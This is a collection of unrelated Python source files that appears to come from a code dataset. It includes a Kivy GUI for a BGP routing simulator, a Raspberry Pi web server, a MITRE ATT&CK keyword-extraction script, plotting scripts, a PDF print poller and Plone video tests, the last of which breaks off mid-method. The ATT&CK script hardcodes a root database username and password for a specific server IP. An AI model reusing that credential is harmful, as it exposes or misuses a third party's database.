link.nodes[1].center_x\n link.points[3] = link.nodes[1]. center_y\n for link in self.pclinks:\n link.points[0] = link.nodes[0].center_x\n link.points[1] = link.nodes[0].center_y\n link.points[2] = link.nodes[1].center_x\n link.points[3] = link.nodes[1]. 
center_y\n link.custIndicator.update_pos(link)\n return True\n\n # on touch_up unclaim the touch\n def on_touch_up(self, touch):\n if touch.grab_current is self:\n touch.ungrab(self)\n return True\n\n\nclass PeerLink(Widget):\n points = ListProperty()\n nodes = ListProperty()\n\n# Widget for dot that indicates customer in p-c link\nclass CustIndicator(Widget):\n # update the position of the dot to match where the arrow line is as best as possible\n def update_pos(self, link):\n if link.nodes[1].center_x != link.nodes[0].center_x:\n m = (float) (link.nodes[1].center_y - link.nodes[0].center_y) / (float) (link.nodes[1].center_x - link.nodes[0].center_x)\n if (link.nodes[1].center_y - link.nodes[0].center_y) < 0:\n # then customer is below provider\n if (link.nodes[1].center_x - link.nodes[0].center_x) < 0:\n # then customer is left of provider\n x = link.nodes[1].center_x + (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y + (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_x - link.nodes[0].center_x) > 0:\n # then customer is right of provider\n x = link.nodes[1].center_x - (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y - (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_y - link.nodes[0].center_y) > 0:\n # then customer is above provider\n if (link.nodes[1].center_x - link.nodes[0].center_x) < 0:\n # then customer is left of provider\n x = link.nodes[1].center_x + (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y + (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_x - link.nodes[0].center_x) > 0:\n # then customer is right of provider\n x = link.nodes[1].center_x - (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y - (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_y - link.nodes[0].center_y) == 0:\n # then customer is at same height as provider\n if (link.nodes[1].center_x - link.nodes[0].center_x) < 0:\n # then customer is left of provider\n x = link.nodes[1].center_x + (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y - (m * 25.0 * math.sqrt(1/(1+(m*m))))\n elif (link.nodes[1].center_x - link.nodes[0].center_x) > 0:\n # then customer is right of provider\n x = link.nodes[1].center_x - (25.0 * math.sqrt(1/(1+(m*m))))\n y = link.nodes[1].center_y - (m * 25.0 * math.sqrt(1/(1+(m*m))))\n else:\n if (link.nodes[1].center_y - link.nodes[0].center_y) < 0:\n # then customer is below provider\n y = link.nodes[1].center_y + 25.0\n x = link.nodes[1].center_x\n elif (link.nodes[1].center_y - link.nodes[0].center_y) > 0:\n # then customer is above provider\n y = link.nodes[1].center_y - 25.0\n x = link.nodes[1].center_x\n self.pos = (x,y)\n\nclass PCLink(Widget):\n points = ListProperty()\n cust_pos = ObjectProperty(None)\n nodes = ListProperty()\n custIndicator = ObjectProperty(None)\n\nclass NetworkCanvas(Widget):\n node_count = NumericProperty(0)\n # dictionary of all nodes on canvas\n node_widgets = DictProperty()\n # list of all canvas links\n plinks = ListProperty()\n pclinks = ListProperty()\n\n def add_node(self, nodeName):\n # id = nodeName + \"__\" + str(self.node_count)\n err, ok = sim.add_node(nodeName)\n if not ok:\n print(err)\n return\n\n temp_node = NodeG()\n temp_node.center = self.center\n # temp_node.node_id = id\n temp_node.node_name = nodeName\n \n self.add_widget(temp_node)\n self.node_widgets[nodeName] = temp_node\n self.node_count = self.node_count + 1\n\n def add_fixed_node(self, node):\n temp_node = FixedNode()\n temp_node.center = node.center \n 
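# Added note: FixedNode is the static counterpart of NodeG used on the\n        # results screen; it keeps node_name/plinks/pclinks but defines no touch\n        # handlers, so the finished topology cannot be dragged around.\n        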
temp_node.node_name = node.node_name\n\n self.node_widgets[temp_node.node_name] = temp_node\n self.node_count = self.node_count + 1\n self.add_widget(temp_node)\n\n def delete_node(self, nodeName):\n # delete node from underlying simulator\n err, ok = sim.delete_node(nodeName)\n if not ok:\n print(err)\n return\n\n # delete any links connected to the node \n # remove link from other node's link list and from canvas\n for link in self.node_widgets[nodeName].plinks:\n self.remove_widget(link)\n self.plinks.remove(link)\n for node in link.nodes:\n if node.node_name != nodeName:\n node.plinks.remove(link)\n\n for link in self.node_widgets[nodeName].pclinks:\n self.remove_widget(link)\n self.pclinks.remove(link)\n for node in link.nodes:\n if node.node_name != nodeName:\n node.pclinks.remove(link)\n\n # delete node from canvas\n self.remove_widget(self.node_widgets[nodeName])\n\n # delete node from simulator GUI \n self.node_widgets.pop(nodeName)\n self.node_count = self.node_count - 1\n\n def add_peer_link(self, p1, p2, mod_sim=True, color=Color(204/255,204/255,204/255)):\n if (mod_sim):\n err, ok = sim.add_peer_link(p1, p2)\n if not ok:\n print(err)\n return\n\n temp_peer_link = PeerLink()\n\n temp_peer_link.canvas.before.add(color)\n\n # add the node link to each peer's link list\n self.node_widgets[p1].plinks.append(temp_peer_link)\n self.node_widgets[p2].plinks.append(temp_peer_link)\n\n # add peer nodes to the link's node list\n temp_peer_link.nodes.append(self.node_widgets[p1])\n temp_peer_link.nodes.append(self.node_widgets[p2])\n\n temp_peer_link.points.append(self.node_widgets[p1].center_x)\n temp_peer_link.points.append(self.node_widgets[p1].center_y)\n temp_peer_link.points.append(self.node_widgets[p2].center_x)\n temp_peer_link.points.append(self.node_widgets[p2].center_y)\n\n self.plinks.append(temp_peer_link)\n self.add_widget(temp_peer_link)\n return temp_peer_link\n\n def add_pc_link(self, p, c, mod_sim=True, color=Color(150/255,150/255,150/255)):\n if (mod_sim):\n err, ok = sim.add_pc_link(p,c)\n if not ok:\n print(err)\n return\n\n temp_pc_link = PCLink()\n temp_pc_link.canvas.before.add(color)\n\n\n # add the node link to each node's link list\n self.node_widgets[p].pclinks.append(temp_pc_link)\n self.node_widgets[c].pclinks.append(temp_pc_link)\n\n # add provider and customer nodes to the link's node list\n temp_pc_link.nodes.append(self.node_widgets[p])\n temp_pc_link.nodes.append(self.node_widgets[c])\n\n #c = self.node_widgets[c].pos\n\n # with temp_pc_link.canvas.after:\n # Color(rgb=(0,0,1))\n # Line(ellipse=(pos=(self.node_widgets[c].pos), size=(10,10)))\n\n temp_pc_link.custIndicator.update_pos(temp_pc_link)\n\n temp_pc_link.points.append(self.node_widgets[c].center_x)\n temp_pc_link.points.append(self.node_widgets[c].center_y)\n\n temp_pc_link.points.append(self.node_widgets[p].center_x)\n temp_pc_link.points.append(self.node_widgets[p].center_y)\n\n self.pclinks.append(temp_pc_link)\n self.add_widget(temp_pc_link)\n return temp_pc_link\n\n def clear(self):\n for key in self.node_widgets:\n # clear all nodes and links from the network canvas \n for link in self.node_widgets[key].plinks:\n self.remove_widget(link)\n for link in self.node_widgets[key].pclinks:\n self.remove_widget(link)\n self.remove_widget(self.node_widgets[key])\n\n\n # remove all nodes from the network canvas's node dictionary\n self.node_widgets.clear()\n\n # remove all the links from the network canvas's link lists\n self.pclinks.clear()\n self.plinks.clear()\n self.node_count = 0\n\n\nclass 
SetupScreen(Screen):\n network_canvas = ObjectProperty(None)\n peerlink = ObjectProperty(None)\n pclink = ObjectProperty(None)\n node_name = ObjectProperty(None)\n delete_node_name = ObjectProperty(None)\n\n def add_nodes(self, nodes):\n node_list = nodes.strip()\n node_list = node_list.split()\n for node in node_list:\n self.network_canvas.add_node(node)\n\n def delete_nodes(self, nodes):\n node_list = nodes.strip()\n node_list = node_list.split()\n for node in node_list:\n self.network_canvas.delete_node(node)\n\n # parse link info input\n def add_peer_relationship(self):\n rel = self.peerlink.text\n rel = rel.strip()\n rel = rel.split()\n if len(rel) != 3:\n print(\"Incorrect peer relationship format\")\n return\n p1 = rel[0]\n p2 = rel[2]\n self.network_canvas.add_peer_link(p1,p2)\n \n # parse link info input\n def add_pc_relationship(self):\n rel = self.pclink.text\n rel = rel.strip()\n rel = rel.split()\n if len(rel) != 3:\n print(\"Incorrect pc relationship format\")\n return\n p = rel[0]\n c = rel[2]\n self.network_canvas.add_pc_link(p,c)\n\n def reset_text_inputs(self):\n self.pclink.text = \"p -> c\"\n self.peerlink.text = \"p = p\"\n self.node_name.text = \"\"\n self.delete_node_name.text = \"\"\n\n\n def populate_sim_screen(self):\n # self.parent.sim_screen.network_canvas = self.network_canvas <--- this does not work unfortunately\n for key in self.network_canvas.node_widgets:\n self.parent.sim_screen.final_network_canvas.add_fixed_node(self.network_canvas.node_widgets[key])\n\n for link in self.network_canvas.plinks:\n self.parent.sim_screen.final_network_canvas.add_peer_link(link.nodes[0].node_name, link.nodes[1].node_name, False)\n \n for link in self.network_canvas.pclinks:\n self.parent.sim_screen.final_network_canvas.add_pc_link(link.nodes[0].node_name, link.nodes[1].node_name, False)\n\n\nclass SimulationScreen(Screen):\n dest_node = ObjectProperty(None)\n results = ObjectProperty(None)\n final_network_canvas = ObjectProperty(None)\n final_route_links = ListProperty()\n\n # To show the results, instead of changing the color of chosen paths, I just draw over them in black\n def simulate(self):\n self.results.text = \"\"\n for link in self.final_route_links:\n self.final_network_canvas.remove_widget(link)\n self.final_route_links.clear()\n dest = self.dest_node.text.strip()\n err, ok = sim.simulate(dest)\n if not ok:\n self.results.text = err\n return\n self.results.text = str(sim)\n for node in sim.nodes:\n # node is node_name\n if sim.nodes[node].finalRoute is not None:\n if len(sim.nodes[node].finalRoute.path) == 1:\n continue\n node2 = sim.nodes[node].finalRoute.path[1]\n if sim.nodes[node].finalRoute.path[1] in sim.nodes[node].providers:\n self.final_route_links.append(self.final_network_canvas.add_pc_link(node2, node, False, Color(0,0,0)))\n elif sim.nodes[node].finalRoute.path[1] in sim.nodes[node].customers:\n self.final_route_links.append(self.final_network_canvas.add_pc_link(node, node2, False, Color(0,0,0)))\n elif sim.nodes[node].finalRoute.path[1] in sim.nodes[node].peers:\n self.final_route_links.append(self.final_network_canvas.add_peer_link(node, node2, False, Color(0,0,0)))\n\n\n def edit_network(self):\n self.final_network_canvas.clear()\n self.results.text = \"\"\n \n def start_over(self):\n sim.clear()\n self.results.text = \"\"\n self.dest_node.text = \"\"\n self.parent.setup.reset_text_inputs()\n self.final_network_canvas.clear()\n self.parent.setup.network_canvas.clear()\n \nclass WindowManager(ScreenManager):\n setup = ObjectProperty(None)\n 
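# Added note: these ObjectProperty handles are presumably bound to ids in\n    # simulatorGUI.kv (loaded below via Builder.load_file); the screens reach\n    # each other through them as self.parent.setup / self.parent.sim_screen.\n    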
sim_screen = ObjectProperty(None)\n\nkv = Builder.load_file(\"simulatorGUI.kv\")\nsim = BGPSimulator()\n\nclass BGPStudyBuddyApp(App):\n def build(self):\n return kv\n\nif __name__ == '__main__':\n BGPStudyBuddyApp().run()","sub_path":"simulatorGUI.py","file_name":"simulatorGUI.py","file_ext":"py","file_size_in_byte":14950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"110182673","text":"import RPi.GPIO as GPIO\nimport random\nfrom bottle import get,run\nimport json\nimport smbus2 as smbus\nimport time\n\n######################################################\n\nGPIO.setmode(GPIO.BCM)\nsw1 = 7\nGPIO.setup(sw1, GPIO.IN)\n\n@get(\"/sw1\")\ndef get_sw1():\n result = GPIO.input(sw1)\n ret = {}\n if result == GPIO.HIGH:\n ret[\"sw1\"] = \"HIGH\"\n else:\n ret[\"sw1\"] = \"LOW\"\n return json.dumps(ret)\n\n######################################################\n\n@get(\"/end\")\ndef get_end():\n rest = random.randint(1,100)\n content = \"貴様の命はあと\"\n content += str(rest)\n content += \"日だ\"\n return content\n\n######################################################\n\nbus = smbus.SMBus(1)\naddress = 0x48\n \n#I2C data read (block)\ndef blockread(reg, value):\n value = bus.read_i2c_block_data(address, reg, value)\n return value\n\n@get(\"/temp\")\ndef get_temp():\n temp_raw = blockread(0x00, 2)\n #温度データの整形\n temp = ((temp_raw[0] << 8 ) | temp_raw[1]) >> 4\n #分解能倍する\n temp = round(temp * 0.0625, 1)\n ret = {\"temp\": temp}\n return json.dumps(ret)\n\n#########################################################\n\nPIN = 21\nGPIO.setup(PIN, GPIO.OUT)\n\n@get(\"/led_once\")\ndef led_once():\n GPIO.output(PIN, GPIO.HIGH)\n time.sleep(3)\n GPIO.output(PIN, GPIO.LOW)\n\n#########################################################\n\nrun(host=\"0.0.0.0\", port=8080)\nGPIO.cleanup()\n","sub_path":"sample/s.py","file_name":"s.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"265772527","text":"from unlock.state.state import UnlockState\n\nclass FastPadState(UnlockState):\n UP = 1\n DOWN = 2\n LEFT = 3\n RIGHT = 4\n SELECT_TIME = 2\n def __init__(self):\n # Initialize the state\n super(FastPadState, self).__init__()\n self.previous_mode = \"CURSOR\"\n self.mode = \"CURSOR\"\n self.currButton = None\n self.button = None\n self.selTime = 0\n self.noop = False\n \n def process_command(self, command):\n \"\"\"\n Update the screen; called periodically on refresh.\n\n Input:\n timeDelta -- (float) Number of seconds since the\n previous call to update()\n decision -- (int) Decision, if any; one of UP, DOWN,\n LEFT, or RIGHT\n selection -- (int) 1 if a selection was made\n\n Raises an Exception if anything goes wrong.\n \"\"\"\n self.noop = False\n if command.decision == FastPadState.LEFT:\n \n self.mode = \"CURSOR\"\n self.button = self.currButton.left\n \n elif command.decision == FastPadState.RIGHT:\n self.mode = \"CURSOR\"\n self.button = self.currButton.right\n \n elif command.decision == FastPadState.UP:\n self.mode = \"CURSOR\"\n self.button = self.currButton.up\n \n elif command.decision == FastPadState.DOWN:\n self.mode = \"CURSOR\"\n self.button = self.currButton.down\n \n elif command.selection:\n self.mode = \"SELECT\"\n self.button = self.currButton\n # We've changed our selection, so reset the timer\n self.selTime = 0\n \n else:\n # If we're in selection mode, track the time\n if self.mode == \"SELECT\":\n \n # Add the time\n self.selTime += 
command.delta\n \n # Should we select self item?\n if self.selTime >= FastPadState.SELECT_TIME:\n \n self.selTime = 0\n self.mode = \"CURSOR\"\n self.button = self.currButton\n else:\n self.noop = True\n \n # If we're not in selection mode, reset the timer\n else:\n self.selTime = 0\n self.noop = True\n\n ","sub_path":"unlock/state/fastpad_state.py","file_name":"fastpad_state.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206485831","text":"import sys\n\nn = int(input().strip())\nexisting_scores = [int(score) for score in input().strip().split()]\nm = int(input().strip())\nlevel_scores = [int(score) for score in input().strip().split()]\n\ndef solve(old_scores, new_scores):\n unique = [] # unique values; used as a stack\n for i in range(n): # find unique scores\n if (len(unique) == 0 or unique[-1] != old_scores[i]): unique.append(old_scores[i])\n for i in range(m): # calculate rank after each level\n while unique and new_scores[i] >= unique[-1]: unique.pop() # while 'unique' is non-empty and ...\n print(len(unique)+1) # print current rank\nsolve(existing_scores, level_scores)\n","sub_path":"hackerrank/climbing-the-leaderboard.py","file_name":"climbing-the-leaderboard.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"623273965","text":"import pymysql\nimport re\nimport os\nimport rake\n\ndef getData(sql):\n test_db = pymysql.connect('211.149.217.34','root','fdsjkl0123','hy')\n cursor = test_db.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n test_db.close()\n return result\ndef arrly(list,data):\n flag=False\n for i in range(len(list)):\n if list[i][0]==data[0] and list[i][1]==data[1]:\n flag=True\n break;\n return flag\ndef replace(str):\n if str is None:\n return \"\"\n str=re.sub('\\\\<.*?\\\\>','',str)\n str=re.sub('\\\\[.*?\\\\]','',str)\n return str.replace(\"\\n\",\"\").replace(\" \",\"\")\ndef getList(pre,ent,mob):\n list=[]\n for i in range(len(pre)):\n key=replace(pre[i][0])\n value=replace(pre[i][1])\n data=[key,value]\n if not arrly(list,data) and key!=\"\" and value!=\"\":\n list.append(data)\n\n for i in range(len(ent)):\n key=replace(ent[i][0])\n value=replace(ent[i][1])\n data=[key,value]\n if not arrly(list,data) and key!=\"\" and value!=\"\":\n list.append(data)\n for i in range(len(mob)):\n key=replace(mob[i][0])\n value=replace(mob[i][1])\n data=[key,value]\n if not arrly(list,data) and key!=\"\" and value!=\"\":\n list.append(data)\n return list\ndef Title():\n pre=getData(\"SELECT T_ID,T_Title FROM Technique_PRE_ATTCK\")\n ent=getData(\"SELECT T_ID,T_Title FROM Technique_Enterprise\")\n mob=getData(\"SELECT T_ID,T_Title FROM Technique_Mobile\")\n\n list=getList(pre,ent,mob)\n for i in range(len(list)):\n with open(\"../../Data/Attributed/Technique/Title/\"+list[i][0]+\".txt\", \"w\",encoding='utf-8') as f:\n f.write(list[i][1])\ndef Description():\n pre=getData(\"SELECT T_ID,T_Descripe FROM Technique_PRE_ATTCK\")\n ent=getData(\"SELECT T_ID,T_Descripe FROM Technique_Enterprise\")\n mob=getData(\"SELECT T_ID,T_Descripe FROM Technique_Mobile\")\n list=getList(pre,ent,mob)\n for i in range(len(list)):\n with open(\"../../Data/Attributed/Technique/Description/\"+list[i][0]+\".txt\", \"w\",encoding='utf-8') as f:\n f.write(list[i][1])\ndef Procedure():\n pre=getData(\"SELECT T_ID,`T_Procedure Examples Description` FROM Technique_PRE_ATTCK\")\n 
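# The same query runs against all three ATT&CK matrices; getList() below\n    # merges the rows and drops empty or duplicate pairs via replace()/arrly().\n    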
ent=getData(\"SELECT T_ID,`T_Procedure Examples Description` FROM Technique_Enterprise\")\n mob=getData(\"SELECT T_ID,`T_Procedure Examples Description` FROM Technique_Mobile\")\n list=getList(pre,ent,mob)\n for i in range(len(list)):\n with open(\"../../Data/Attributed/Technique/Procedure/\"+list[i][0]+\".txt\", \"w\",encoding='utf-8') as f:\n f.write(list[i][1])\ndef line(list):\n st=[]\n for i in range(len(list)):\n key=list[i][0]\n value=str(list[i][1])\n st.append(key+\",\"+value)\n return st;\ndef key():\n stoppath = '../../Data/KeyStoplist/SmartStoplist.txt'\n\n rake_object = rake.Rake(stoppath, 1, 5, 1)\n dits=['Procedure','Title','Description']\n for j in range(len(dits)):\n files=file(\"../../Data/Attributed/Technique/\"+dits[j]+\"/\")\n for i in range(len(files)):\n sample_file = open(\"../../Data/Attributed/Technique/\"+dits[j]+\"/\"+files[i], 'r', encoding=\"utf-8\")\n text = sample_file.read()\n\n keywords = rake_object.run(text)\n str=line(keywords)\n filename=files[i];\n filename=filename[:filename.find(\".\")]\n with open(\"../../Data/Key/Technique/\"+dits[j]+\"/\"+filename+\"_key.txt\", \"w\",encoding='utf-8') as f:\n f.write(\":\".join(str))\ndef file(path):\n list=[]\n for root, dirs, files in os.walk(path):\n for f in files:\n list.append(f)\n return list\nif __name__==\"__main__\":\n #Title()\n #Description()\n #Procedure()\n key()\n #file(\"../../Data/Procedure/\")","sub_path":"Experiment/dataPreprocessing/attributedExtraction.py","file_name":"attributedExtraction.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"249298089","text":"import numpy as np\nimport smart\nfrom matplotlib import pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib.collections import LineCollection\nfrom astropy.io import fits \nimport matplotlib\nimport sys, os\nimport datetime\nmatplotlib.rcParams['text.usetex'] = False\n\ndef plotting():\n HERE = os.path.dirname(os.path.abspath(__file__))\n place = os.path.join(HERE, \"clouds\")\n\n try:\n os.mkdir(place)\n except OSError:\n pass\n\n sim = smart.interface.Smart(tag = \"earth\")\n sim.smartin.alb_file = \"composite1_txt.txt\"\n infile = \"earth_avg.pt\"\n\n HERE = os.path.dirname(os.path.abspath(__file__))\n place = os.path.join(HERE, \"clouds\")\n\n try:\n os.mkdir(place)\n except OSError:\n pass\n\n \n sim.set_run_in_place(place) \n sim.set_executables_automatically()\n \n\n\n sim.load_atmosphere_from_pt(infile, addn2 = False)\n sim.set_planet_proxima_b()\n \n\n import platform\n \n if platform.system() == 'Darwin':\n # On a Mac: usetex ok\n mpl.rc('font',**{'family':'serif','serif':['Computer Modern']})\n mpl.rcParams['font.size'] = 25.0\n mpl.rc('text', usetex=True)\n elif platform.node().startswith(\"n\"):\n # On hyak: usetex not ok, must change backend to 'agg'\n mpl.rc('font',**{'family':'serif','serif':['Computer Modern']})\n mpl.rcParams['font.size'] = 25.0\n mpl.rc('text', usetex=False)\n plt.switch_backend('agg')\n cirrus = smart.readsmart.Rad(\"clouds/_cirrus_hitran2012_5000_20000cm_toa.rad\")\n cirrus_wl = cirrus.lam\n cirrus_flux = cirrus.pflux\n cirrus_sflux = cirrus.sflux\n cirrus_flux = cirrus_flux/cirrus_sflux * ((sim.smartin.radius / sim.smartin.r_AU) **2 )\n strato = smart.readsmart.Rad(\"clouds/_strato_hitran2012_5000_20000cm_toa.rad\")\n strato_wl = strato.lam\n strato_flux = strato.pflux\n strato_sflux = strato.sflux\n strato_flux = strato_flux/strato_sflux * ((sim.smartin.radius / sim.smartin.r_AU) **2 )\n avg_wl = 
(cirrus_wl[:len(strato_wl)] + strato_wl)/2\n    avg_flux = (cirrus_flux[:len(strato_flux)] + strato_flux)/2\n    fig, ax = plt.subplots(figsize = (30, 10))\n    ax.plot(avg_wl, avg_flux)\n    from matplotlib import rcParams\n    for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +\n             ax.get_xticklabels() + ax.get_yticklabels()):\n        item.set_fontsize(20)\n    ax.set_ylabel(\"Reflectance\")\n    ax.set_xlabel(\"Wavelength ($\\\mu$ m)\")\n    ax.set_title(\"Earth\")\n    fig.savefig(\"avg_clouds.png\", bbox_inches = 'tight')\n    \nif __name__ == '__main__':\n\n    import platform\n\n    if platform.node().startswith(\"mox\"):\n        # On the mox login node: submit job\n        runfile = __file__\n        smart.utils.write_slurm_script_python(runfile,\n                                               name=\"clouds\",\n                                               subname=\"submit.csh\",\n                                               workdir = \"\",\n                                               nodes = 1,\n                                               mem = \"500G\",\n                                               walltime = \"5:00:00\",\n                                               ntasks = 28,\n                                               account = \"vsm\",\n                                               submit = True,\n                                               rm_after_submit = True)\n    elif platform.node().startswith(\"n\"):\n        # On a mox compute node: ready to run\n        plotting()\n    else:\n        # Presumably, on a regular computer: ready to run\n        cirrus_wl, cirrus_flux = clouds(10, 1, 0)\n        strato_wl, strato_flux = clouds(10, 0, 1)\n        avg_wl = (cirrus_wl + strato_wl)/2\n        avg_flux = (cirrus_flux + strato_flux)/2\n        fig, ax = plt.subplots(figsize = (30, 10))\n        ax.plot(avg_wl, avg_flux)\n        fig.savefig(\"avg_clouds_low.png\", bbox_inches = 'tight')\n    \n\n\n\n\n\n\n\n\n","sub_path":"clouds_short.py","file_name":"clouds_short.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409310596","text":"from moviepy.editor import *\n\nvideo = VideoFileClip(\"Video_1_Nina.mp4\").subclip(1,2)\n\n# Make the text. Many more options are available.\ntxt_clip = ( TextClip(\"My Holidays 2013\",fontsize=70,color='white')\n             .set_position('center')\n             .set_duration(10) )\n\nresult = CompositeVideoClip([video, txt_clip]) # Overlay text on video","sub_path":"week20170116Multi_Threads/movie_Py_test.py","file_name":"movie_Py_test.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"215488723","text":"\n\nfrom xai.brain.wordbase.nouns._diode import _DIODE\n\n#class header\nclass _DIODES(_DIODE, ):\n\tdef __init__(self,): \n\t\t_DIODE.__init__(self)\n\t\tself.name = \"DIODES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"diode\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_diodes.py","file_name":"_diodes.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"191627665","text":"import requests\nimport hashlib\nimport os\nimport time\nimport subprocess\nfrom pathlib import Path\nurl = \"http://18.202.59.170:8080/gdpr.pdf\"\n\ndef loop():\n    last_hash = \"\"\n    bytes = download_file()\n    last_hash = calculateSHA256(bytes)\n\n    while True:\n        time.sleep(2)\n        bytes = download_file()\n        hash = calculateSHA256(bytes)\n        print(\"Last Hash:\", last_hash)\n        print(\"New Hash:\", hash)\n        if hash != last_hash:\n            print(\"!!!!FILE CHANGE DETECTED!!!!\")\n            last_hash = hash\n            delete_pdf()\n            write_pdf(bytes)\n            print_pdf()\n\ndef delete_pdf():\n    file = Path(\"pdf.pdf\")\n    if file.is_file():\n        os.remove(\"pdf.pdf\")\n\ndef write_pdf(bytes):\n    with open('pdf.pdf', 'wb') as f:\n        f.write(bytes)\n        f.close()\n\ndef print_pdf():\n    file = Path(\"pdf.pdf\")\n    if file.is_file():\n        subprocess.call([\"lpr\", \"-P\", \"Canon\", 
\"pdf.pdf\"])\n\ndef download_file():\n return requests.get(url).content\n\ndef calculateSHA256(bytes):\n sha256_hasher = hashlib.sha256()\n sha256_hasher.update(bytes)\n return sha256_hasher.hexdigest()\n\nloop()","sub_path":"print/print.py","file_name":"print.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"297480889","text":"# -*- coding: utf-8 -*-\nimport unittest2 as unittest\nimport os\nfrom zope.interface import alsoProvides\nfrom zope.component import createObject\nfrom zope.component import queryUtility\n\nfrom plone.dexterity.interfaces import IDexterityFTI\n\nfrom plone.app.testing import SITE_OWNER_NAME\nfrom plone.app.testing import SITE_OWNER_PASSWORD\nfrom plone.testing.z2 import Browser\n\nfrom wildcard.media.interfaces import IVideoEnabled\nfrom wildcard.media.browser.widget import MediaStream\n\nfrom wildcard.media.testing import (\n MEDIA_INTEGRATION_TESTING,\n MEDIA_FUNCTIONAL_TESTING\n)\n\nfrom plone.app.testing import TEST_USER_ID, setRoles\nfrom plone.app.z3cform.interfaces import IPloneFormLayer\nfrom wildcard.media.tests import getVideoBlob, test_file_dir\nfrom wildcard.media.settings import GlobalSettings\nfrom plone.rfc822.interfaces import IPrimaryFieldInfo, IPrimaryField\n\n\nclass VideoIntegrationTest(unittest.TestCase):\n\n layer = MEDIA_INTEGRATION_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n self.request['ACTUAL_URL'] = self.portal.absolute_url()\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n settings = GlobalSettings(self.portal)\n settings.additional_video_formats = []\n\n def getFti(self):\n return queryUtility(IDexterityFTI, name='WildcardVideo')\n\n def create(self, id):\n self.portal.invokeFactory('WildcardVideo', id,\n video_file=getVideoBlob('mp4'),\n video_file_ogv=getVideoBlob('ogv'),\n video_file_webm=getVideoBlob('webm'))\n return self.portal[id]\n\n def test_schema(self):\n fti = self.getFti()\n schema = fti.lookupSchema()\n self.assertEqual(schema.getName(), 'plone_0_WildcardVideo')\n\n def test_fti(self):\n fti = self.getFti()\n self.assertNotEquals(None, fti)\n\n def test_factory(self):\n fti = self.getFti()\n factory = fti.factory\n new_object = createObject(factory)\n self.assertTrue(IVideoEnabled.providedBy(new_object))\n\n def test_adding(self):\n self.create('video1')\n self.assertTrue(IVideoEnabled.providedBy(self.portal['video1']))\n\n def test_view(self):\n self.create('video2')\n video = self.portal['video2']\n video.title = \"My video\"\n video.description = \"This is my video.\"\n self.request.set('URL', video.absolute_url())\n self.request.set('ACTUAL_URL', video.absolute_url())\n alsoProvides(self.request, IPloneFormLayer)\n view = video.restrictedTraverse('@@view')\n\n result = view()\n self.assertTrue(result)\n self.assertEqual(view.request.response.status, 200)\n self.assertTrue('My video' in result)\n self.assertTrue('This is my video.' 
in result)\n        self.assertIn(\n            '++widget++form.widgets.IVideo.video_file/@@download/test.mp4',\n            result)\n        self.assertIn(\n            '++widget++form.widgets.IVideo.video_file_ogv/@@download/test.ogv',\n            result)\n        self.assertIn(\n            '++widget++form.widgets.IVideo.video_file_webm/@@download/test.webm',\n            result)\n\n    def test_media_range_request(self):\n        self.create('video3')\n        video = self.portal['video3']\n        alsoProvides(self.request, IPloneFormLayer)\n        view = video.restrictedTraverse('@@view')\n        view()\n\n        widget = view.widgets.get('IVideo.video_file')\n        stream = MediaStream(widget, self.request)\n\n        stream()\n        self.assertEqual(self.request.response.status, 200)\n        self.assertNotIn('Content-Range', self.request.response.headers)\n\n        for start in (0, 1000, 2000):\n            self.request.environ['HTTP_RANGE'] = 'bytes=%i-' % start\n            stream()\n            # Partial content responses for ranges\n            self.assertEqual(self.request.response.status, 206)\n            self.assertEqual(self.request.response.getHeader('Accept-Ranges'),\n                             'bytes')\n            content_range = self.request.response.getHeader('Content-Range')\n            self.assertIsNotNone(content_range)\n            self.assertTrue(content_range.startswith('bytes %i-' % start))\n\n    def test_primary_field(self):\n        video = self.create('video')\n        info = IPrimaryFieldInfo(video)\n        self.assertEquals(info.fieldname, 'video_file')\n        self.assertTrue(IPrimaryField.providedBy(info.field))\n\n\nclass VideoFunctionalTest(unittest.TestCase):\n\n    layer = MEDIA_FUNCTIONAL_TESTING\n\n    def setUp(self):\n        app = self.layer['app']\n        self.portal = self.layer['portal']\n        settings = GlobalSettings(self.portal)\n        settings.additional_video_formats = []\n        self.request = self.layer['request']\n        self.portal_url = self.portal.absolute_url()\n        self.browser = Browser(app)\n        self.browser.handleErrors = False\n        self.browser.addHeader(\n            'Authorization',\n            'Basic %s:%s' % (SITE_OWNER_NAME, SITE_OWNER_PASSWORD,)\n        )\n\n    def test_add_video(self):\n        